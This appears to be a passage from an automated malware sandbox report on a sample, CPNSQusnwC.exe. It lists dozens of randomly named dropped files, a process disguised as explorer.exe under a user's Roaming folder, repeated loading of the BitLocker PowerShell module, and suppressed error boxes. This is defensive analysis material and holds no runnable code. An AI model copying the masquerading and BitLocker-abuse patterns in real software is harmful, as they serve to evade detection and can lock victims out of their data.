                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\scaNtKAs.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\hovXJzGK.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\QhesqMaw.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\GzLcGkVO.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\xQsMWHQg.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\bvfQbQIf.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DiqTAfIW.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\vEieQmso.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UOyjNWIs.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\AxLDtRxd.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\tQeVfYwq.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\zJHvHEBf.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\WJAzEWli.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\fJbhCUkS.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UPlQSaAj.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\LmdbigkC.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\sUqvPban.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\cSkqvYkZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\aIOpvFFY.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ELylTcFa.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nDhGzpaM.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TmvagkQx.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\QwEjYoPD.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FZhLDyOY.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ejwQzjeb.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TvSaQXjt.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\jWOPcftP.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\GWITZydS.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\gljzVSiX.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\bqhiOmsd.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FnPmnTXV.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\UJAAAsrr.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\CxYvgXXc.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nTDOpObA.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\liYyiBRH.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\SVwsOfwt.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\qVqwKxgw.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\HzZUtpuN.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\uaPNCQpm.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TkfSyAEq.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\wdeWzfMx.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\pxxplmMK.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\eJSyBaRc.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ySVMqwBm.logJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
